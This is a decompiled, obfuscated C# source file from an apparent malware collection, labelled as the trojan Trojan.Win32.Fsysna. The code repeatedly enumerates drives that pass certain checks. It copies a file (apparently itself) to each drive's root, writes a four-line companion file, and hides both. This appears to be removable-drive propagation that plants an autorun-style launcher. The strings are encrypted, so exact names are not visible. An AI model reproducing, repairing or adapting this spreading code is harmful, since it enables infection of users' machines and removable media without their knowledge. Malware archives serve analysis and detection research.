MalwareSourceCode/MSIL/Trojan/Win32/F/Trojan.Win32.Fsysna.deeq-bccdbf807edf4ae3f172c9e102415d19675fee38175dc7fe4f296402da8186a9/_0019/_001E.cs
2022-08-18 06:28:56 -05:00

67 lines
3.2 KiB
C#
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

// Decompiled with JetBrains decompiler
// Type: .
// Assembly: MyApplication, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 4C1CA376-1B35-4961-80E8-8029AD6B5A8B
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Fsysna.deeq-bccdbf807edf4ae3f172c9e102415d19675fee38175dc7fe4f296402da8186a9.exe
using \u0003;
using \u0005;
using \u0019;
using System;
using System.IO;
namespace \u0019
{
internal class \u001E
{
[NonSerialized]
internal static \u0002 \u0001;
public static void \u0095()
{
if (\u001B.\u0003 > 0)
goto label_10;
label_9:
\u0083\u0002.\u0014\u0003(1000);
\u001E.\u0095();
return;
label_10:
\u0018 obj = new \u0018();
foreach (DriveInfo driveInfo in \u0093.\u0003\u0004())
{
if (\u0082\u0002.\u0012\u0002(\u0098\u0002.\u007E\u000F\u0002((object) \u0088\u0002.\u007E\u0001\u0004((object) driveInfo)), \u001E.\u0001(678)) && \u0082\u0002.\u0013\u0002(\u0098\u0002.\u007E\u009F\u0003((object) driveInfo), \u001E.\u0001(691)) && \u0082\u0002.\u0013\u0002(\u0098\u0002.\u007E\u009F\u0003((object) driveInfo), \u001E.\u0001(696)) && \u0084.\u007E\u0002\u0004((object) driveInfo))
{
if (\u001C\u0002.\u0006\u0004(\u0005\u0003.\u001D\u0002(\u0098\u0002.\u007E\u000F\u0002((object) \u0098\u0002.\u007E\u009F\u0003((object) driveInfo)), \u001E.\u0001(701))))
{
if (\u001C\u0002.\u0006\u0004(\u0005\u0003.\u001D\u0002(\u0098\u0002.\u007E\u000F\u0002((object) \u0098\u0002.\u007E\u009F\u0003((object) driveInfo)), \u001E.\u0001(718))))
continue;
}
try
{
\u001B\u0002.\u0004\u0004(\u0006\u0003.\u0008(), \u0005\u0003.\u001D\u0002(\u0098\u0002.\u007E\u009F\u0003((object) driveInfo), \u001E.\u0001(718)));
if (\u001C\u0002.\u0006\u0004(\u0005\u0003.\u001D\u0002(\u0098\u0002.\u007E\u009F\u0003((object) driveInfo), \u001E.\u0001(718))))
{
FileInfo fileInfo = new FileInfo(\u0005\u0003.\u001D\u0002(\u0098\u0002.\u007E\u009F\u0003((object) driveInfo), \u001E.\u0001(701)));
StreamWriter streamWriter = \u0093\u0002.\u007E\u000E\u0004((object) fileInfo);
\u0008\u0002.\u007E\u0017\u0004((object) streamWriter, \u001E.\u0001(731));
\u0008\u0002.\u007E\u0017\u0004((object) streamWriter, \u001E.\u0001(744));
\u0008\u0002.\u007E\u0017\u0004((object) streamWriter, \u001E.\u0001(761));
\u0008\u0002.\u007E\u0017\u0004((object) streamWriter, \u001E.\u0001(798));
\u009E.\u007E\u0015\u0004((object) streamWriter);
\u0011\u0002.\u0007\u0004(\u0005\u0003.\u001D\u0002(\u0098\u0002.\u007E\u009F\u0003((object) driveInfo), \u001E.\u0001(701)), FileAttributes.Hidden);
\u0011\u0002.\u0007\u0004(\u0005\u0003.\u001D\u0002(\u0098\u0002.\u007E\u009F\u0003((object) driveInfo), \u001E.\u0001(718)), FileAttributes.Hidden);
\u001B.\u0086(\u009D\u0002.\u001F\u0002(\u001E.\u0001(819), obj.\u0005, \u001E.\u0001(832), \u0098\u0002.\u007E\u009F\u0003((object) driveInfo)));
}
}
catch
{
}
}
}
goto label_9;
}
static \u001E() => \u0004.\u007F();
}
}